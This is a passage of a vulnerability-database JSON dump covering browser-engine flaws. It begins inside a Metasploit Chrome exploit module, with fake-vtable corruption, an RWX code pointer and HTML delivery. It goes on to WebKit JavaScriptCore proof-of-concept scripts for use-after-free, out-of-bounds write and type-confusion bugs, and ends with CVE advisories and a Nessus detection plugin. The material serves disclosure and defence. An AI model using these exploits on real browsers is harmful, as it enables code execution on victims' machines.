ArrayBuffer(0x80); \nlet fake_vtab_u64 = new BigUint64Array(fake_vtab); \nlet fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n); \n \nlet div = document.createElement('div'); \nlet div_addr = memory.addrof(div); \nprint('div_addr @ ' + hex(div_addr)); \nlet el_addr = memory.readPtr(div_addr + 0x20n); \nprint('el_addr @ ' + hex(div_addr)); \n \nfake_vtab_u64.fill(wasm_rwx_addr, 6, 10); \nmemory.writePtr(el_addr, fake_vtab_addr); \n \nprint('Triggering...'); \n \n// Trigger virtual call \ndiv.dispatchEvent(new Event('click')); \n \n// We are done here, repair the corrupted array buffers \nlet addr = memory.addrof(driver_buf); \nmemory.writePtr(addr + 32n, original_driver_buf_ptr); \nmemory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr); \n} \n \npwn(); \n^ \n \nif datastore['DEBUG_EXPLOIT'] \ndebugjs = %Q^ \nprint = function(arg) { \nvar request = new XMLHttpRequest(); \nrequest.open(\"POST\", \"/print\", false); \nrequest.send(\"\" + arg); \n}; \n^ \njscript = \"#{debugjs}#{jscript}\" \nelse \njscript.gsub!(/\\/\\/.*$/, '') # strip comments \njscript.gsub!(/^\\s*print\\s*\$.*?\$;\\s*$/, '') # strip print(*); \nend \n \nhtml = %Q^ \n<html> \n<head> \n<script> \n#{jscript} \n</script> \n</head> \n<body> \n</body> \n</html> \n^ \n \nsend_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'}) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156640/chrome_object_create.rb.txt", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-01-16T18:50:49", "description": "", "cvss3": {}, "published": "2019-01-16T00:00:00", "type": "packetstorm", "title": "WebKit JSC JIT Use-After-Free", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-4442"], "modified": "2019-01-16T00:00:00", "id": "PACKETSTORM:151180", "href": "https://packetstormsecurity.com/files/151180/WebKit-JSC-JIT-Use-After-Free.html", "sourceData": "`WebKit: JSC: JIT: GetIndexedPropertyStorage can GC \n \nCVE-2018-4442 \n \n \nThe doesGC function simply takes a node, and tells if it might cause a garbage collection. This function is used to determine whether to insert write barriers. But it's missing some cases such as StringCharAt, StringCharCodeAt and GetByVal that might cause a garbage collection via rope strings. As a result, it can lead to UaF. \n \nPoC 1 - StringCharAt: \nfunction gc() { \nfor (let i = 0; i < 10; i++) { \nnew ArrayBuffer(1024 * 1024 * 10); \n} \n} \n \nfunction opt(arr) { \nlet r = /a/; \nlet o = {}; \n \narr[0].charAt(0); \narr[1].charAt(0); \narr[2].charAt(0); \narr[3].charAt(0); \narr[4].charAt(0); \narr[5].charAt(0); \narr[6].charAt(0); \narr[7].charAt(0); \narr[8].charAt(0); \narr[8].charAt(0); \narr[9].charAt(0); \n \no.x = 'a'.match(r); \n \nreturn o; \n} \n \nfunction main() { \nfor (let i = 0; i < 10000; i++) { \nopt(['a' + i, 'b' + i, 'c' + i, 'd' + i, 'e' + i, 'f' + i, 'g' + i, 'h' + i, 'i' + i, 'j' + i]); \n} \n \nlet a = 'a'.repeat(1024 * 1024 * 2); \nlet b = 'a'.repeat(1024 * 1024 * 2); \n \nlet arr = []; \nfor (let i = 0; i < 10; i++) { \narr[i] = a + b; \n} \n \ngc(); \n \nlet o = opt(arr); \n \ngc(); \n \nlet tmp = [1234]; \n \nprint(o.x); // 1234 \n} \n \nmain(); \n \nPoC 2 - StringCharCodeAt: \nfunction gc() { \nfor (let i = 0; i < 10; i++) { \nnew ArrayBuffer(1024 * 1024 * 10); \n} \n} \n \nfunction opt(arr) { \nlet r = /a/; \nlet o = {}; \n \narr[0].charCodeAt(0); \narr[1].charCodeAt(0); \narr[2].charCodeAt(0); \narr[3].charCodeAt(0); \narr[4].charCodeAt(0); \narr[5].charCodeAt(0); \narr[6].charCodeAt(0); \narr[7].charCodeAt(0); \narr[8].charCodeAt(0); \narr[8].charCodeAt(0); \narr[9].charCodeAt(0); \n \no.x = 'a'.match(r); \n \nreturn o; \n} \n \nfunction main() { \nfor (let i = 0; i < 10000; i++) { \nopt(['a' + i, 'b' + i, 'c' + i, 'd' + i, 'e' + i, 'f' + i, 'g' + i, 'h' + i, 'i' + i, 'j' + i]); \n} \n \nlet a = 'a'.repeat(1024 * 1024 * 2); \nlet b = 'a'.repeat(1024 * 1024 * 2); \n \nlet arr = []; \nfor (let i = 0; i < 10; i++) { \narr[i] = a + b; \n} \n \ngc(); \n \nlet o = opt(arr); \n \ngc(); \n \nlet tmp = [1234]; \n \nprint(o.x); // 1234 \n} \n \nmain(); \n \nPoC 3 - GetByVal: \nfunction gc() { \nfor (let i = 0; i < 10; i++) { \nnew ArrayBuffer(1024 * 1024 * 10); \n} \n} \n \nfunction opt(arr) { \nlet r = /a/; \nlet o = {}; \n \narr[0][0]; \narr[1][0]; \narr[2][0]; \narr[3][0]; \narr[4][0]; \narr[5][0]; \narr[6][0]; \narr[7][0]; \narr[8][0]; \narr[8][0]; \narr[9][0]; \n \no.x = 'a'.match(r); \n \nreturn o; \n} \n \nfunction main() { \nfor (let i = 0; i < 10000; i++) { \nopt(['a' + i, 'b' + i, 'c' + i, 'd' + i, 'e' + i, 'f' + i, 'g' + i, 'h' + i, 'i' + i, 'j' + i]); \n} \n \nlet a = 'a'.repeat(1024 * 1024 * 2); \nlet b = 'a'.repeat(1024 * 1024 * 2); \n \nlet arr = []; \nfor (let i = 0; i < 10; i++) { \narr[i] = a + b; \n} \n \ngc(); \n \nlet o = opt(arr); \n \ngc(); \n \nlet tmp = [1234]; \n \nprint(o.x); // 1234 \n} \n \nmain(); \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available (whichever is earlier), the bug \nreport will become visible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/151180/GS20190116151559.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-05-26T05:54:17", "description": "", "cvss3": {}, "published": "2017-05-25T00:00:00", "type": "packetstorm", "title": "WebKit JSC BindingNode::bindValue Failed Reference Count Increase", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2505"], "modified": "2017-05-25T00:00:00", "id": "PACKETSTORM:142664", "href": "https://packetstormsecurity.com/files/142664/WebKit-JSC-BindingNode-bindValue-Failed-Reference-Count-Increase.html", "sourceData": "` WebKit: JSC: BindingNode::bindValue doesn't increase the scope's reference count \n \nCVE-2017-2505 \n \n \nHere's a snippet of BindingNode::bindValue. \n \nvoid BindingNode::bindValue(BytecodeGenerator& generator, RegisterID* value) const \n{ \n... \nRegisterID* scope = generator.emitResolveScope(nullptr, var); \ngenerator.emitExpressionInfo(divotEnd(), divotStart(), divotEnd()); \nif (m_bindingContext == AssignmentContext::AssignmentExpression) \ngenerator.emitTDZCheckIfNecessary(var, nullptr, scope); \nif (isReadOnly) { \ngenerator.emitReadOnlyExceptionIfNeeded(var); \nreturn; \n} \ngenerator.emitPutToScope(scope, var, value, generator.isStrictMode() ? ThrowIfNotFound : DoNotThrowIfNotFound, initializationModeForAssignmentContext(m_bindingContext)); \ngenerator.emitProfileType(value, var, divotStart(), divotEnd()); \nif (m_bindingContext == AssignmentContext::DeclarationStatement || m_bindingContext == AssignmentContext::ConstDeclarationStatement) \ngenerator.liftTDZCheckIfPossible(var); \n... \n} \n \nThat method uses |scope| without increasing its reference count. Thus, in |emitTDZCheckIfNecessary|, same |RegisterID| might be used. \n \nGenerated opcode of the PoC: \n[ 124] resolve_scope loc13, loc3, a(@id4), <ClosureVar>, 0, 0x62d00011f1a0 \n[ 131] get_from_scope loc13, loc13, a(@id4), 1050627<DoNotThrowIfNotFound|ClosureVar|NotInitialization>, 0 predicting None \n[ 139] op_check_tdz loc13 \n[ 141] put_to_scope loc13, a(@id4), loc12, 1050627<DoNotThrowIfNotFound|ClosureVar|NotInitialization>, <structure>, 0 \n \nAt 131, loc13 which points the scope is overwritten with |a|. \nAt 141, |a| is used as a scope, and it causes OOB write. \n \nPoC: \n(function () { \nlet a = { \nget val() { \n[...{a = 1.45}] = []; \na.val.x; \n}, \n}; \n \na.val; \n})(); \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/142664/GS20170526052003.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-12T10:40:37", "description": "", "cvss3": {}, "published": "2018-12-12T00:00:00", "type": "packetstorm", "title": "WebKit JIT Proxy Object Issue", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-4438"], "modified": "2018-12-12T00:00:00", "id": "PACKETSTORM:150746", "href": "https://packetstormsecurity.com/files/150746/WebKit-JIT-Proxy-Object-Issue.html", "sourceData": "`WebKit: JIT: Int32/Double arrays can have Proxy objects in the prototype chains \n \nCVE-2018-4438 \n \n \nBug: \nvoid JSObject::setPrototypeDirect(VM& vm, JSValue prototype) \n{ \nASSERT(prototype); \nif (prototype.isObject()) \nprototype.asCell()->didBecomePrototype(); \n \nif (structure(vm)->hasMonoProto()) { \nDeferredStructureTransitionWatchpointFire deferred(vm, structure(vm)); \nStructure* newStructure = Structure::changePrototypeTransition(vm, structure(vm), prototype, deferred); \nsetStructure(vm, newStructure); \n} else \nputDirect(vm, knownPolyProtoOffset, prototype); \n \nif (!anyObjectInChainMayInterceptIndexedAccesses(vm)) \nreturn; \n \nif (mayBePrototype()) { \nstructure(vm)->globalObject()->haveABadTime(vm); \nreturn; \n} \n \nif (!hasIndexedProperties(indexingType())) \nreturn; \n \nif (shouldUseSlowPut(indexingType())) \nreturn; \n \nswitchToSlowPutArrayStorage(vm); \n} \n \nJavaScriptCore doesn't allow native arrays to have Proxy objects as prototypes. If we try to set the prototype of an array to a Proxy object, it will end up calling either switchToSlowPutArrayStorage or haveABadTime in the above method. switchToSlowPutArrayStorage will transition the array to a SlowPutArrayStorage array. And haveABadTime will call switchToSlowPutArrayStorage on every object in the VM on a first call. Since subsequent calls to haveABadTime won't have any effect, with two global objects we can create an array having a Proxy object in the prototype chain. \n \nExploit: \ncase HasIndexedProperty: { \nArrayMode mode = node->arrayMode(); \n \nswitch (mode.type()) { \ncase Array::Int32: \ncase Array::Double: \ncase Array::Contiguous: \ncase Array::ArrayStorage: { \nbreak; \n} \ndefault: { \nclobberWorld(); \nbreak; \n} \n} \nsetNonCellTypeForNode(node, SpecBoolean); \nbreak; \n} \n \nFrom: <a href=\"https://github.com/WebKit/webkit/blob/9ca43a5d4bd8ff63ee7293cac8748d564bd7fbbd/Source/JavaScriptCore/dfg/DFGAbstractInterpreterInlines.h#L3481\" title=\"\" class=\"\" rel=\"nofollow\">https://github.com/WebKit/webkit/blob/9ca43a5d4bd8ff63ee7293cac8748d564bd7fbbd/Source/JavaScriptCore/dfg/DFGAbstractInterpreterInlines.h#L3481</a> \n \nThe above routine is based on the assumption that if the input array is a native array, it can't intercept indexed accesses therefore it will have no side effects. But actually we can create such arrays which break that assumption making it exploitable to lead to type confusion. \n \nPoC: \n<body> \n<script> \n \nfunction opt(arr, arr2) { \narr[1] = 1.1; \n \nlet tmp = 0 in arr2; \n \narr[0] = 2.3023e-320; \n \nreturn tmp; \n} \n \nfunction main() { \nlet o = document.body.appendChild(document.createElement('iframe')).contentWindow; \n \n// haveABadTime \no.eval(` \nlet p = new Proxy({}, {}); \nlet a = {__proto__: {}}; \na.__proto__.__proto__ = p; \n`); \n \nlet arr = [1.1, 2.2]; \nlet arr2 = [1.1, 2.2]; \n \nlet proto = new o.Object(); \nlet handler = {}; \n \narr2.__proto__ = proto; \nproto.__proto__ = new Proxy({}, { \nhas() { \narr[0] = {}; \n \nreturn true; \n} \n}); \n \nfor (let i = 0; i < 10000; i++) { \nopt(arr, arr2); \n} \n \nsetTimeout(() => { \ndelete arr2[0]; \n \nopt(arr, arr2); \n \nalert(arr[0]); \n}, 500); \n} \n \nmain(); \n \n</script> \n</body> \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available (whichever is earlier), the bug \nreport will become visible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/150746/GS20181212044220.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-07-26T22:47:05", "description": "", "cvss3": {}, "published": "2017-07-25T00:00:00", "type": "packetstorm", "title": "WebKit JSC JSArray::appendMemcpy Uninitialized Memory Copy", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7064"], "modified": "2017-07-25T00:00:00", "id": "PACKETSTORM:143479", "href": "https://packetstormsecurity.com/files/143479/WebKit-JSC-JSArray-appendMemcpy-Uninitialized-Memory-Copy.html", "sourceData": "` WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy \n \nCVE-2017-7064 \n \n \nWebKit: JSC: JSArray::appendMemcpy uninitialized memory copy \n \nHere's a snippet of JSArray::appendMemcpy. \n \nbool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray) \n{ \nauto scope = DECLARE_THROW_SCOPE(vm); \n \nif (!canFastCopy(vm, otherArray)) \nreturn false; \n \nIndexingType type = indexingType(); \nIndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType()); \nif (type == ArrayWithUndecided && copyType != NonArray) { \nif (copyType == ArrayWithInt32) \nconvertUndecidedToInt32(vm); \nelse if (copyType == ArrayWithDouble) \nconvertUndecidedToDouble(vm); \nelse if (copyType == ArrayWithContiguous) \nconvertUndecidedToContiguous(vm); \nelse { \nASSERT(copyType == ArrayWithUndecided); \nreturn true; \n} \n} else if (type != copyType) \nreturn false; \n \n... \n \nif (type == ArrayWithDouble) \nmemcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength); \nelse \nmemcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength); \n \nreturn true; \n} \n \nThe method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data. \nSo, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type. \n \nPoC: \nfunction optNewArrayAndConcat() { \nlet a = [,,,,,,,,,]; \nreturn Array.prototype.concat.apply(a); \n} \n \nfunction main() { \nArray.prototype.constructor = { \n[Symbol.species]: function () { \nreturn [{}]; \n} \n}; \n \ngc(); \n \nfor (let i = 0; i < 0x10000; i++) { \noptNewArrayAndConcat().fill({}); \n} \n \ngc(); \n \nfor (let i = 0; i < 0x20000; i++) { \nlet res = optNewArrayAndConcat(); \nif (res[0]) \nprint(res.toString()); \n} \n} \n \nmain(); \n \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/143479/GS20170725014549.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "redhatcve": [{"lastseen": "2022-06-08T05:16:14", "description": "Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-10-09T06:26:34", "type": "redhatcve", "title": "CVE-2018-17463", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2022-06-08T05:09:47", "id": "RH:CVE-2018-17463", "href": "https://access.redhat.com/security/cve/cve-2018-17463", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-08T08:13:35", "description": "Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-03T01:51:43", "type": "redhatcve", "title": "CVE-2019-8518", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2022-06-08T05:50:49", "id": "RH:CVE-2019-8518", "href": "https://access.redhat.com/security/cve/cve-2019-8518", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T11:57:48", "description": "An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.\r\n\r\nHere's a snippet of BindingNode::bindValue.\r\n```\r\nvoid BindingNode::bindValue(BytecodeGenerator& generator, RegisterID* value) const\r\n{\r\n ...\r\n RegisterID* scope = generator.emitResolveScope(nullptr, var);\r\n generator.emitExpressionInfo(divotEnd(), divotStart(), divotEnd());\r\n if (m_bindingContext == AssignmentContext::AssignmentExpression)\r\n generator.emitTDZCheckIfNecessary(var, nullptr, scope);\r\n if (isReadOnly) {\r\n generator.emitReadOnlyExceptionIfNeeded(var);\r\n return;\r\n }\r\n generator.emitPutToScope(scope, var, value, generator.isStrictMode() ? ThrowIfNotFound : DoNotThrowIfNotFound, initializationModeForAssignmentContext(m_bindingContext));\r\n generator.emitProfileType(value, var, divotStart(), divotEnd());\r\n if (m_bindingContext == AssignmentContext::DeclarationStatement || m_bindingContext == AssignmentContext::ConstDeclarationStatement)\r\n generator.liftTDZCheckIfPossible(var);\r\n ...\r\n}\r\n```\r\nThat method uses |scope| without increasing its reference count. Thus, in |emitTDZCheckIfNecessary|, same |RegisterID| might be used.\r\n\r\n### Generated opcode of the PoC:\r\n```\r\n[ 124] resolve_scope loc13, loc3, a(@id4), <ClosureVar>, 0, 0x62d00011f1a0\r\n[ 131] get_from_scope loc13, loc13, a(@id4), 1050627<DoNotThrowIfNotFound|ClosureVar|NotInitialization>, 0 predicting None\r\n[ 139] op_check_tdz loc13\r\n[ 141] put_to_scope loc13, a(@id4), loc12, 1050627<DoNotThrowIfNotFound|ClosureVar|NotInitialization>, <structure>, 0\r\n```\r\nAt 131, loc13 which points the scope is overwritten with |a|.\r\nAt 141, |a| is used as a scope, and it causes OOB write.\r\n\r\n### PoC:\r\n```\r\n(function () {\r\n let a = {\r\n get val() {\r\n [...{a = 1.45}] = [];\r\n a.val.x;\r\n },\r\n };\r\n\r\n a.val;\r\n})();\r\n```", "cvss3": {}, "published": "2017-05-26T00:00:00", "type": "seebug", "title": "WebKit: JSC: BindingNode::bindValue doesn't increase the scope's reference count(CVE-2017-2505)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2505"], "modified": "2017-05-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93145", "id": "SSV:93145", "sourceData": "\n (function () {\r\n let a = {\r\n get val() {\r\n [...{a = 1.45}] = [];\r\n a.val.x;\r\n },\r\n };\r\n\r\n a.val;\r\n})();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-93145", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T11:56:46", "description": "WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy\r\n\r\nHere's a snippet of `JSArray::appendMemcpy`.\r\n```\r\nbool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)\r\n{\r\n auto scope = DECLARE_THROW_SCOPE(vm);\r\n\r\n if (!canFastCopy(vm, otherArray))\r\n return false;\r\n\r\n IndexingType type = indexingType();\r\n IndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType());\r\n if (type == ArrayWithUndecided && copyType != NonArray) {\r\n if (copyType == ArrayWithInt32)\r\n convertUndecidedToInt32(vm);\r\n else if (copyType == ArrayWithDouble)\r\n convertUndecidedToDouble(vm);\r\n else if (copyType == ArrayWithContiguous)\r\n convertUndecidedToContiguous(vm);\r\n else {\r\n ASSERT(copyType == ArrayWithUndecided);\r\n return true;\r\n }\r\n } else if (type != copyType)\r\n return false;\r\n\r\n ...\r\n\r\n if (type == ArrayWithDouble)\r\n memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);\r\n else\r\n memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength);\r\n\r\n return true;\r\n}\r\n```\r\n\r\nThe method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data.\r\nSo, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type.\r\n\r\n### PoC:\r\n```\r\nfunction optNewArrayAndConcat() {\r\n let a = [,,,,,,,,,];\r\n return Array.prototype.concat.apply(a);\r\n}\r\n\r\nfunction main() {\r\n Array.prototype.constructor = {\r\n [Symbol.species]: function () {\r\n return [{}];\r\n }\r\n };\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x10000; i++) {\r\n optNewArrayAndConcat().fill({});\r\n }\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x20000; i++) {\r\n let res = optNewArrayAndConcat();\r\n if (res[0])\r\n print(res.toString());\r\n }\r\n}\r\n\r\nmain();\r\n```", "cvss3": {}, "published": "2017-07-27T00:00:00", "type": "seebug", "title": "WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy(CVE-2017-7064)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7064"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96302", "id": "SSV:96302", "sourceData": "\n function optNewArrayAndConcat() {\r\n let a = [,,,,,,,,,];\r\n return Array.prototype.concat.apply(a);\r\n}\r\n\r\nfunction main() {\r\n Array.prototype.constructor = {\r\n [Symbol.species]: function () {\r\n return [{}];\r\n }\r\n };\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x10000; i++) {\r\n optNewArrayAndConcat().fill({});\r\n }\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x20000; i++) {\r\n let res = optNewArrayAndConcat();\r\n if (res[0])\r\n print(res.toString());\r\n }\r\n}\r\n\r\nmain();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96302", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2021-08-19T12:29:24", "description": "This update for webkit2gtk3 to version 2.22.5 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2018-4438: Fixed a logic issue which lead to memory corruption (bsc#1119554)\n\nCVE-2018-4437, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4464: Fixed multiple memory corruption issues with improved memory handling (bsc#1119553, bsc#1119555, bsc#1119556, bsc#1119557, bsc#1119558)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-24T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2019:0146-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464"], "modified": "2021-01-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2019-0146-1.NASL", "href": "https://www.tenable.com/plugins/nessus/121343", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0146-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121343);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4464\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2019:0146-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for webkit2gtk3 to version 2.22.5 fixes the following\nissues :\n\nSecurity issues fixed :\n\nCVE-2018-4438: Fixed a logic issue which lead to memory corruption\n(bsc#1119554)\n\nCVE-2018-4437, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443,\nCVE-2018-4464: Fixed multiple memory corruption issues with improved\nmemory handling (bsc#1119553, bsc#1119555, bsc#1119556, bsc#1119557,\nbsc#1119558)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119555\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4437/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4438/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4441/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4442/\"\n );\n script_set_attribute(\n 